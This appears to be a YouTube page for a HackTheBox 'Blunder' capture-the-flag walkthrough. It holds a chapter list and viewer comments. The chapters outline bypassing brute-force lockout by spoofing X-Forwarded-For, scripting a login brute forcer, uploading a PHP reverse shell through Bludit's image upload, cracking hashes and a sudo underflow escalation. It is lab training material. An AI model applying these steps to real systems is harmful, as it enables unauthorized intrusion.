HackTheBox - Blunder

Рет қаралды 30,543

Күн бұрын

00:00 - Intro
01:03 - Start of NMAP
04:30 - Discovering install.php, which says bludit is being installed.
06:30 - Looking for exploits searchsploit, everything requires Auth
07:35 - Attempting a login and noticing the CSRF Tokens
09:20 - Looking for exploits online that haven't made it to SearchSploit yet
12:00 - Placing the X-FORWARDED-FOR header to bypass brute force protection
15:40 - Creating a Python Brute Forcer
16:45 - Scripting: Grabbing the CSRF Value with python requests
18:20 - Scripting: Grabbing the PHP Session Cookie with python requests
18:20 - Scripting: Sending a login request with python requests
18:20 - Scripting: Telling request to not follow and detect a valid login
31:10 - Using Cewl to build a wordlist, then changing our python script to pull passwords from our wordlist
34:30 - Scripting: Setting a random IP in X-Forwarded-For header
37:50 - Scripting: Scripting fixing a bug then getting a password via brute force!
41:00 - Start of playing around with the Bludit Image Upload Vulnerability.
45:10 - Having trouble, running the exploit with metasploit through a proxy to understand what is going on
47:50 - Uploading a PHP Reverse shell then HTAccess file to get code execution
01:02:30 - Reverse shell returned, finding passwords in the bludit database, then cracking them.
01:08:20 - Cracked a password for hugo, switching to his user
01:09:30 - Doing the SUDO underflow exploit

Пікірлер: 90

@azelbane87 3 жыл бұрын

Just SPECTACULAR as usual! When U do boxes like that(with no prep or whatever) I just admit I learn much MUCH MUCH more 'cause you go through all the troubleshooting process to get things done and allows me to understand things that otherwise would not seem that obvious. Your working flow is amazing IPPSEC although I guess it 'irritates' you when videos get longer than what you expect....but honestly following you through all the steps in troubleshooting things THAT is SOMETHING ELSE! You have no clue how much MORE I learn!! AWESOME STUFF,JUST AWESOME!! thanks as usual for the time and effort in you put into it! BLESS U

@ca7986 3 жыл бұрын

You have a lot of patience! 😁 Amazing video as always!❤️

@nios1515 3 жыл бұрын

Taking my OSCP tomorrow, wish me luck! Thanks for the video

@DHIRAL2908 3 жыл бұрын

Good luck!!!

@maluniversity 3 жыл бұрын

you should get wasted first, then take it. it numbs the pain from the boxes that you'll have absolutely no idea about.

@tamilxctf4075 3 жыл бұрын

Fail fail fail = p455!

@segev1824 3 жыл бұрын

How did it go?

@UnknownSend3r 3 жыл бұрын

So how did it go ?

@abdosama 3 жыл бұрын

First view first comment, i always learn from your videos, thank you

@hardikmalani2180 3 жыл бұрын

Blunder was my first box :) Solved it yesterday Copied everything from KZbin But it's a great deal ;)

@mayankdeshmukh8752 3 жыл бұрын

That's how you learn buddy ;)

@hardikmalani2180 3 жыл бұрын

@@mayankdeshmukh8752 :)

@crafterzman5277 3 жыл бұрын

That's gonna get you banned from the platform

@vonniehudson 3 жыл бұрын

@ippsec: thanks for the Github issues trick. That was very insightful. You mentioned it at 01:01:53

@kret63 3 жыл бұрын

That three tens Dude! I laughed and screamed!

@Ms.Robot. 3 жыл бұрын

Well done! Bravo! 😍💝 applaud, applaud.

@lc5813 3 жыл бұрын

hey ipp i was wondering how do you guys clean up machines you hacked after a assessment. Any methods you want to show on a next hackthebox machine? thanks for the great content ;)

@loganmay2105 3 жыл бұрын

I think there is a small issue with your code, if you were to get a CSRF error that password would never be tried against the login since the error is with the token not the credentials. The fastest way to fix this would just be to convert your wordlist into a list when it's imported and then: if r.status_code != 200: print("CSRF Error") wordlist.append(password) return False This way you would try it again after going through the rest of the list, and keep retrying any you got an invalid CSRF for. I could have missed something in your code though lol so sorry if I'm mistaken. Great video as always.

@8668maroto 3 жыл бұрын

TY for this videos!!!

@alimujtaba9063 3 жыл бұрын

One day i will come to your channel and do all machines ❤️Thankyou love from pakistan.Now working on basics.

@marcusflodkvist7423 3 жыл бұрын

NOOOO, I just started with this box. I even found the csrf bruteforce method..... Ohh well, I'll just have to watch this....

@tamilxctf4075 3 жыл бұрын

Noice bruh!!!😏🏅🎃

@crundle2855 3 жыл бұрын

oddly enough this box doesnt need that clever bruteforce at all - the foothold password was right there on the page, guessed it on the first try. it really stands out because its missing some whitespace :)

@bugr33d0_hunter8 3 жыл бұрын

Way to be Mr.Crundle, nice 👌 cavêąt👍

@rujotheone 3 жыл бұрын

Didn't notice that. Someone recommended I use Cewl to build a password list. Was about to try that.

@hippityhoppitygetoffmyprop1000 3 жыл бұрын

Someone just told me it’s camel cased. This method however is so much more unique and interesting.

@MrMeLaX 3 жыл бұрын

Thank you.

@bugr33d0_hunter8 3 жыл бұрын

🛀 :~/$ wc

@h4cker_io 3 жыл бұрын

thank you

@m_peter1514 3 жыл бұрын

thank you so match

@bugr33d0_hunter8 3 жыл бұрын

😇

@buhaytza2005 3 жыл бұрын

Wouldn't it be easier to get the CSRF token and instead of extracting the cookies just to set up r = requests.Session() and then it retains all the cookies?

@ertertz9408 3 жыл бұрын

I was so unbelievably stuck on root, I took TWO MONTHS (I mean I did take two long breaks because I got demotivated as fuck). I don't know how I managed to take this long, I even KNEW ABOUT THE SUDO BUG AND THE AFFECTED VERSIONS.

@shayboual1892 3 жыл бұрын

If you look through shauns files, u can find a hidden file called sudo as admin successful and screenshot of him escalating himself to root through hugos account

@WashingtonFernandes 2 жыл бұрын

1:09:08 Some Debian/Ubuntu based distros have some aliases to use ls commands la is and alias for ls -la and there are other ones like ll, l, lh and some more

@giuliom126 3 жыл бұрын

Uff! Finished just 3 days ago

@c1ph3rpunk 3 жыл бұрын

‘la’ is probably an alias on the box. I think most RHEL/CentOS machines come with some aliases like ll and la.

@redpanda31337 3 жыл бұрын

Should check out the aliases on parrotOS, there are some nice hidden gems in there ;)

@neunzehnvierundachtzig 2 жыл бұрын

@@redpanda31337 the 'sudo' have some very good aliases

@lercenico8260 3 жыл бұрын

1:09:12 -> la is alias for 'ls -A'

@arachn1d13 3 жыл бұрын

which in in turn is output of "type la" :)

@muratkacmaz789 3 жыл бұрын

wow 😱😵

@bugr33d0_hunter8 3 жыл бұрын

🤡🤯

@DHIRAL2908 3 жыл бұрын

😛

@chandrakanth4241 3 жыл бұрын

i saw the first video on youtube with zero dislikes, NICE. I thought there are bot's which will just randomly dislike videos.

@mayankdeshmukh8752 3 жыл бұрын

Hey ipp, why don't you try "hashid" tool, it gives jtr format and hashcat mode based on the hash ;)

@itzkoushik3233 3 жыл бұрын

legends dont buy , they hack them up .

@shayboual1892 3 жыл бұрын

Me (who spent hours on this machine and only managed to get a www-data shell) when you searched blundit : What a fool

@shayboual1892 3 жыл бұрын

I just finished the video and i realised the only thing i needed to do was put best64 rules in hashcat. Thats so annoying. I even knew about the sudo part since there are hints in the box you can find with good enumeration. This was my first box aswell and i was so close to doing it

@redpanda31337 3 жыл бұрын

@@shayboual1892 i just searched the hash in google, first result was the password.

@shayboual1892 3 жыл бұрын

@@redpanda31337 huh, never thought of doing that

@luisito7018 3 жыл бұрын

hahaha it happens

@TheQuest07 3 жыл бұрын

I cannot upgrade shell. How can I upgrade this? I used metasploit for the file upload vuln python3 -c ‘pty;pty.spawn(“/bin/bash”)’ ctrl + z background channel 0? [y/N] y meterpreter> stty raw -echo Unknown command: stty So I background again and now in mfs6 exploit(linux…..blahblahblah)> I try stty raw -echo here and the lines go funny. Instead of a new line under, it is beside the old line. I try stty rows 16 columns 136 but nothing changes. fg also does not work… I cannot get stty raw -echo to work, and therefore export TERM=xterm does not work either I get it will work if I do the exploit manually, but i would like to know how to do this for future problems Thank you for your help everyone and thank you for the videos @IppSec

@raycharles6240 3 жыл бұрын

For some reason this box is giving me different results. First Metasploit and meterpreter worked, then all of a sudden it didn't anymore. Weird.

@Alkiiis 3 жыл бұрын

I didn't even need to bruteforce i found the username in /todo.txt and the password was hidden in the first article. :)

@Alkiiis 3 жыл бұрын

@Pedro Abreu Yes, this would have been my go to plan but the password was hidden way to obvious, so no need for bruteforce.

@bernasevinc5259 3 жыл бұрын

Where can I download this parrot? I couldn't find it on the internet

@mehmetux4186 3 жыл бұрын

i never understandet x forworded for header when this header was wrinting in internet. i read some document its say proxy server write for follow ip addres but it should be different i think. does anyone can say how it is work. which application or layer write ip address write this hidden layer

@DHIRAL2908 3 жыл бұрын

It basically tells the server that this request was forwarded (or made) by this particular ip. Without this header, the server can just see the sender's ip on the request like the address on a letter. But specifying this leads some servers to believe it!

@mehmetux4186 3 жыл бұрын

@@DHIRAL2908 thanks friend. İ am trying to understand when ip address wroten there and which application doing this job. When request go out browser or my machine this header didn't show. And we show also this video in burp this header can't seem. But he wrote manually

@DHIRAL2908 3 жыл бұрын

@@mehmetux4186 yeah that is because we can manually write the header in the request to confuse the server to think this was sent by someone else. Basically not the same ip as before leading to bypassing the ip ban!

@mehmetux4186 3 жыл бұрын

@@DHIRAL2908 but when we didn't write manually also our ip address wroten by something because server know our original ip address when we didn't write manually. İ want to learn when and which app writing automaticly .

@DHIRAL2908 3 жыл бұрын

@@mehmetux4186 it's pretty rare to see a browser writing it automatically. It maybe happens if you have a proxy and the server wants your machine's own ip maybe to send something....

@rujotheone 3 жыл бұрын

Nooo. I just started this box. Couldn't get the password. My list was not sufficient

@rujotheone 3 жыл бұрын

@@johncollins9466 got the password but I got stuck at bruteforcing. Seems the CSRF token was the issue. Now watching this video

@antoniob.6515 5 ай бұрын

Supreme, but I can teach you how to use Vim 😊

@thepioneer517 3 жыл бұрын

Why don't you use cherrytree anymore? You made more notes in the last few vidos...

@bugr33d0_hunter8 3 жыл бұрын

🍒 cherrytree got spanked. Its not the runner up anymore.

@cimihan4816 3 жыл бұрын

@@bugr33d0_hunter8 what you recommend better than that or equivalent to it?

@karimmohamed3744 3 жыл бұрын

@@cimihan4816 joplin

@fatherdani 3 жыл бұрын

'la' is an alias of 'ls -A' in .bashrc

@0xmmn 9 ай бұрын

how is this box rated as easy?

@miguelmota9714 3 жыл бұрын

Why would you use cewl instead of already known password lists like rockyou?

@Xx-nd1rs Жыл бұрын

I think it will take long

@csmole1231 3 жыл бұрын

I just had a really weird dream! a woman doesn't like me, she step back and grab a screen out of her purse, that screen has a red warning background with some lines of code on it, she flash the screen in front of my eye, and all of a sudden my eye hurt then go blind and i fall onto the ground and start shaking then i wake up 😂 the first thought i have is being very pissed at myself: "why the heck would you execute that!"😂lol

@csmole1231 3 жыл бұрын

i can't quite remember why that woman doesn't like me :/ we were relaxing at some beautiful park then i asked something resembling "so what hashes do you like"😂😂😂😂

@nonasuomynona1734 3 жыл бұрын

@@csmole1231 interesting

@dwpersGC 3 жыл бұрын

Love your videos, but man this one was agonizing to get through. You were flying way too fast and making so many mistakes with typing. Missing the alias for 'la' and so on. It's the first time I wanted to stop watching one of your videos. With all that said, still big ups to you for working through this and posting it. Just remember that slow is smooth and smooth is fast.